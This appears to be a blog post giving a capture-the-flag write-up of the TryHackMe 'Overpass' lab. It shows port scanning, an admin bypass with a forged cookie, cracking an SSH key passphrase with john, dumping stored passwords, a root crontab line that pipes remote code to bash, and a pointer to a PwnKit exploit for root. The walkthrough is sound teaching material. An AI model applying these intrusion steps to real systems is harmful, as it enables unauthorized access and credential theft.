<!doctype html><html lang="en" data-mode="dark"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7"><meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"><meta name="viewport" content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover" ><meta name="generator" content="Jekyll v4.3.4" /><meta property="og:title" content="Overpass" /><meta name="author" content="Ibrahim" /><meta property="og:locale" content="en" /><meta name="description" content="What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success!" /><meta property="og:description" content="What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success!" /><link rel="canonical" href="/posts/overpass/" /><meta property="og:url" content="/posts/overpass/" /><meta property="og:site_name" content="Ibrahim EO." /><meta property="og:type" content="article" /><meta property="article:published_time" content="2024-03-10T00:00:00+01:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Overpass" /><meta name="twitter:site" content="@twitter_username" /><meta name="twitter:creator" content="@Ibrahim" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Ibrahim"},"dateModified":"2024-03-10T00:00:00+01:00","datePublished":"2024-03-10T00:00:00+01:00","description":"What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success!","headline":"Overpass","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/overpass/"},"url":"/posts/overpass/"}</script><title>Overpass | Ibrahim EO.</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Ibrahim EO."><meta name="application-name" content="Ibrahim EO."><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="/assets/css/elomarii-portfolio.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.5.2/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.27.20/dist/tocbot.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css"><body><aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end"><header class="profile-wrapper"> <a href="/" id="avatar" class="rounded-circle"><img src="/assets/avatar.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a><h1 class="site-title"> <a href="/whoami">Ibrahim EO.</a></h1><p class="site-subtitle fst-italic mb-0">InfoSec Enthousiaste</p></header><nav class="flex-column flex-grow-1 w-100 ps-0"><ul class="nav"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/projects/" class="nav-link"> <i class="fa-fw fas fa-bars-progress"></i> <span>PROJECTS</span> </a><li class="nav-item"> <a href="/blog/" class="nav-link"> <i class="fa-fw fas fa-newspaper"></i> <span>BLOG</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tags"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/whoami/" class="nav-link"> <i class="fa-fw fas fa-chess-rook"></i> <span>WHOAMI</span> </a></ul></nav><div class="sidebar-bottom d-flex flex-wrap align-items-center w-100"> <a href="https://github.com/elomarii" aria-label="github" target="_blank" rel="noopener noreferrer" > <i class="fab fa-github"></i> </a> <a href="https://www.linkedin.com/in/ibrahim-el-omari/" aria-label="linkedin" target="_blank" rel="noopener noreferrer" > <i class="fab fa-linkedin"></i> </a> <a href="javascript:location.href = 'mailto:' + ['i.ibrahim.elomari','gmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a></div></aside><div id="main-wrapper" class="d-flex justify-content-center"><div class="container d-flex flex-column px-xxl-5"><header id="topbar-wrapper" aria-label="Top Bar"><div id="topbar" class="d-flex align-items-center justify-content-between px-lg-3 h-100" ><nav id="breadcrumb" aria-label="Breadcrumb"> <span> <a href="/">Home</a> </span> <span>Overpass</span></nav><button type="button" id="sidebar-trigger" class="btn btn-link"> <i class="fas fa-bars fa-fw"></i> </button><div id="topbar-title"> Post</div><button type="button" id="search-trigger" class="btn btn-link"> <i class="fas fa-search fa-fw"></i> </button> <search id="search" class="align-items-center ms-3 ms-lg-0"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..." > </search> <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button></div></header><div class="row flex-grow-1"><main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4"><article class="px-1"><header><h1 data-toc-skip>Overpass</h1><p class="post-desc fw-light mb-4">What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success!</p><div class="post-meta text-muted"> <span> Posted <time data-ts="1710025200" data-df="ll" data-bs-toggle="tooltip" data-bs-placement="bottom" > Mar 10, 2024 </time> </span><div class="d-flex justify-content-between"> <span> By <em> Ibrahim </em> </span><div> <span class="readtime" data-bs-toggle="tooltip" data-bs-placement="bottom" title="868 words" > <em>4 min</em> read</span></div></div></div></header><div class="content"><p>Given the IP address of the target machine, we launch first our scan.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>$ sudo nmap -sV $target_ip -Pn -n -p-
&lt;...snip...&gt;
Host is up (0.041s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</pre></table></code></div></div><p>The Go-powered HTTP server serves the website of the company Overpass. From there we can download executables of the password manager as well as the source code.<br /> The team uses rot47 as the cryptography scheme, which is very weak, and anyone who can access the encryption file called <code class="language-plaintext filepath highlighter-rouge">.overpass</code> can decrypt all the contained passwords.</p><p>Enumerating the website directories, we find the admin login page. One might try to brute force some login credentials, but the challenge hints at an OWASP vulnerability so there should be a better way.</p><p>Inspecting the source code we have at <code class="language-plaintext filepath highlighter-rouge">/admin</code> we find several scripts being referenced, which we can check out.<br /> The most interesting one is <code class="language-plaintext filepath highlighter-rouge">login.js</code> which implements the logic of the login procedure. It’s in this script where the flaw resides. Cookies management is broken (OWASP broken access control) and we can add our own cookie with any random value and will get accepted and give us a session as an admin.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre><td class="rouge-code"><pre>$ curl http://&lt;target_ip&gt;/admin/ --cookie "SessionToken=whatever"

&lt;...snip...&gt;
        &lt;div&gt;
            &lt;p&gt;Since you keep forgetting your password, James, I've set up SSH keys for you.&lt;/p&gt;
            &lt;p&gt;If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you.&lt;br&gt;
                Also, we really need to talk about this "Military Grade" encryption. - Paradox&lt;/p&gt;
            &lt;pre&gt;-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337
LNu5wQBBz7pKZ3cc4TWlxIUuD/opJi1DVpPa06pwiHHhe8Zjw3/v+xnmtS3O+qiN
&lt;...snip...&gt;
+hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk
2cWk/Mln7+OhAApAvDBKVM7/LGR9/sVPceEos6HTfBXbmsiV+eoFzUtujtymv8U7
-----END RSA PRIVATE KEY-----&lt;/pre&gt;
        &lt;/div&gt;
    &lt;/div&gt;
&lt;/body&gt;
</pre></table></code></div></div><p>Very juicy information. We got an RSA private key as well as the corresponding username James. Now we can try connecting via SSH.<br /> Let <code class="language-plaintext filepath highlighter-rouge">id_rsa</code> be the file containing the private key. If we try ssh to the target machine, we’ll be prompted to enter a passphrase:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>$ ssh james@&lt;target_ip&gt; -i id_rsa
Enter passphrase for key 'id_rsa': 
</pre></table></code></div></div><p>Let’s use <code class="language-plaintext highlighter-rouge">john</code> to crack this passphrase. First, we extract the passphrase’s hash, and then we launch the attack:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>$ ssh2john id_rsa &gt; hash
$ john hash -wordlist:/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
james13          (id_rsa)
</pre></table></code></div></div><p>Sweet, now we can connect. The user flag is in James’ home directory.<br /> That directory contains another note, named <code class="language-plaintext filepath highlighter-rouge">todo.txt</code>:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>james@overpass-prod:~$ cat todo.txt
 
To Do:
&gt; Update Overpass' Encryption, Muirland has been complaining that it's not strong enough
&gt; Write down my password somewhere on a sticky note so that I don't forget it.
  Wait, we make a password manager. Why don't I just use that?
&gt; Test Overpass for macOS, it builds fine but I'm not sure it actually works
&gt; Ask Paradox how he got the automated build script working and where the builds go.
  They're not updating on the website
</pre></table></code></div></div><p>James uses Overpass, thus, the <code class="language-plaintext filepath highlighter-rouge">.overpass</code> file is in his home directory. Having this file, we can use Overpass (downloadable from the website) to access James’ passwords (maybe we can use them later):</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre>james@overpass-prod:~$ ./overpassLinux       
                                                         
Welcome to Overpass
Options:
1       Retrieve Password For Service
2       Set or Update Password For Service
3       Delete Password For Service
4       Retrieve All Passwords
5       Exit
Choose an option:       4
System   saydrawnlyingpicture
</pre></table></code></div></div><p>While exploring the machine for possible privilege escalation opportunities, I came across the below crontab file and thought maybe we could manipulate <code class="language-plaintext filepath highlighter-rouge">buildscript.sh</code> to obtain a root shell. Unfortunately, I couldn’t find that file on the machine (looks like the web app is hosted on a virtual environment different from <code class="language-plaintext highlighter-rouge">overpass-prod</code>).</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>james@overpass-prod:~$ cat  /etc/crontab

&lt;...snip...&gt;
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.monthly )
# Update builds from latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
</pre></table></code></div></div><p>Without any further enumeration, we use the <code class="language-plaintext filepath highlighter-rouge">linPEAS.sh</code> to give us quick results.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>james@overpass-prod:~$ ./linPEAS.sh
&lt;...snip...&gt;
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester                                            
[+] [CVE-2021-4034] PwnKit                                                                    
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
</pre></table></code></div></div><p>Check out <a href="https://github.com/berdav/CVE-2021-4034">this GitHub repo</a> for a good exploitation script.</p><p>Once executed, we have access to a root shell. Hence, the root flag.</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw me-1"></i> <a href="/blog/ctf-writeups/">CTF Writeups</a>, <a href="/blog/try-hack-me/">Try Hack Me</a>, <a href="/blog/overpass-series/">Overpass Series</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw me-1"></i> <a href="/tags/ssh/" class="post-tag no-text-decoration" >SSH</a> <a href="/tags/john/" class="post-tag no-text-decoration" >john</a></div><div class=" post-tail-bottom d-flex justify-content-between align-items-center mt-5 pb-2 " ><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper d-flex align-items-center"> <span class="share-label text-muted">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Overpass%20-%20Ibrahim%20EO.&url=%2Fposts%2Foverpass%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter"> <i class="fa-fw fa-brands fa-square-x-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Overpass%20-%20Ibrahim%20EO.&u=%2Fposts%2Foverpass%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=%2Fposts%2Foverpass%2F&text=Overpass%20-%20Ibrahim%20EO." target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <button id="copy-link" aria-label="Copy link" class="btn small" data-bs-toggle="tooltip" data-bs-placement="top" title="Copy link" data-title-succeed="Link copied successfully!" > <i class="fa-fw fas fa-link pe-none fs-6"></i> </button> </span></div></div></div></article></main><aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 mb-5 text-muted"><div class="access"><section id="access-lastmod"><h2 class="panel-heading">Recently Updated</h2><ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2"><li class="text-truncate lh-lg"> <a href="/posts/itsy-bitsy/">ItsyBitsy</a><li class="text-truncate lh-lg"> <a href="/posts/k-cessation/">K-Cessation</a><li class="text-truncate lh-lg"> <a href="/posts/race-condition/">Race Conditions Challenge</a><li class="text-truncate lh-lg"> <a href="/projects/attack-titan/">The Attack Titan</a><li class="text-truncate lh-lg"> <a href="/posts/wonderland/">Wonderland</a></ul></section><section><h2 class="panel-heading">Trending Tags</h2><div class="d-flex flex-wrap mt-3 mb-1 me-3"> <a class="post-tag btn btn-outline-primary" href="/tags/cryptography/">Cryptography</a> <a class="post-tag btn btn-outline-primary" href="/tags/john/">john</a> <a class="post-tag btn btn-outline-primary" href="/tags/gpg/">GPG</a> <a class="post-tag btn btn-outline-primary" href="/tags/wireshark/">Wireshark</a> <a class="post-tag btn btn-outline-primary" href="/tags/apache2/">Apache2</a> <a class="post-tag btn btn-outline-primary" href="/tags/aws/">AWS</a> <a class="post-tag btn btn-outline-primary" href="/tags/binwalk/">binwalk</a> <a class="post-tag btn btn-outline-primary" href="/tags/borg/">borg</a> <a class="post-tag btn btn-outline-primary" href="/tags/c/">C</a> <a class="post-tag btn btn-outline-primary" href="/tags/des/">DES</a></div></section></div></aside></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4"><aside id="related-posts" aria-labelledby="related-label"><h3 class="mb-4" id="related-label">Further Reading</h3><nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4"><article class="col"> <a href="/posts/tomghost/" class="post-preview card h-100"><div class="card-body"> <time data-ts="1708470000" data-df="ll" > Feb 21, 2024 </time><h4 class="pt-0 my-2">Tomghost</h4><div class="text-muted"><p>Identify recent vulnerabilities to try exploit the system or read files that you should not have access to.</p></div></div></a></article><article class="col"> <a href="/posts/agent-sudo/" class="post-preview card h-100"><div class="card-body"> <time data-ts="1707951600" data-df="ll" > Feb 15, 2024 </time><h4 class="pt-0 my-2">Agent Sudo</h4><div class="text-muted"><p>You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.</p></div></div></a></article><article class="col"> <a href="/posts/overpass-3-hosting/" class="post-preview card h-100"><div class="card-body"> <time data-ts="1710284400" data-df="ll" > Mar 13, 2024 </time><h4 class="pt-0 my-2">Overpass 3 Hosting</h4><div class="text-muted"><p>You know them, you love them, your favourite group of broke computer science students have another business venture! Show them that they probably should hire someone for security...</p></div></div></a></article></nav></aside><nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation"> <a href="/posts/startup/" class="btn btn-outline-primary" aria-label="Older" ><p>Startup</p></a> <a href="/posts/overpass-2-hacked/" class="btn btn-outline-primary" aria-label="Newer" ><p>Overpass 2 Hacked</p></a></nav><footer aria-label="Site Info" class=" d-flex flex-column justify-content-center text-muted flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3 " ><p>© <time>2024</time> <a href="https://github.com/elomarii">Ibrahim El Omari</a>. <span data-bs-toggle="tooltip" data-bs-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author." >Some rights reserved.</span></p><p>Using the <a data-bs-toggle="tooltip" data-bs-placement="top" title="v7.0.1" href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener" >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.</p></footer></div></div><div id="search-result-wrapper" class="d-flex justify-content-center d-none"><div class="col-11 content"><div id="search-hints"><section><h2 class="panel-heading">Trending Tags</h2><div class="d-flex flex-wrap mt-3 mb-1 me-3"> <a class="post-tag btn btn-outline-primary" href="/tags/cryptography/">Cryptography</a> <a class="post-tag btn btn-outline-primary" href="/tags/john/">john</a> <a class="post-tag btn btn-outline-primary" href="/tags/gpg/">GPG</a> <a class="post-tag btn btn-outline-primary" href="/tags/wireshark/">Wireshark</a> <a class="post-tag btn btn-outline-primary" href="/tags/apache2/">Apache2</a> <a class="post-tag btn btn-outline-primary" href="/tags/aws/">AWS</a> <a class="post-tag btn btn-outline-primary" href="/tags/binwalk/">binwalk</a> <a class="post-tag btn btn-outline-primary" href="/tags/borg/">borg</a> <a class="post-tag btn btn-outline-primary" href="/tags/c/">C</a> <a class="post-tag btn btn-outline-primary" href="/tags/des/">DES</a></div></section></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><aside aria-label="Scroll to Top"> <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow"> <i class="fas fa-angle-up"></i> </button></aside></div><div id="mask"></div><aside id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-bs-animation="true" data-bs-autohide="false" ><div class="toast-header"> <button type="button" class="btn-close ms-auto" data-bs-dismiss="toast" aria-label="Close" ></button></div><div class="toast-body text-center pt-0"><p class="px-2 mb-3">A new version of content is available.</p><button type="button" class="btn btn-primary" aria-label="Update"> Update </button></div></aside><script src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.11/dayjs.min.js,npm/dayjs@1.11.11/locale/en.min.js,npm/dayjs@1.11.11/plugin/relativeTime.min.js,npm/dayjs@1.11.11/plugin/localizedFormat.min.js"></script> <script src="/assets/js/dist/post.min.js"></script> <script defer src="/app.min.js"></script> <script>SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<article class="px-1 px-sm-2 px-lg-4 px-xl-0"><header><h2><a href="{url}">{title}</a></h2><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div></header><p>{snippet}</p></article>', noResultsText: '<p class="mt-5">Oops! No results found.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script>
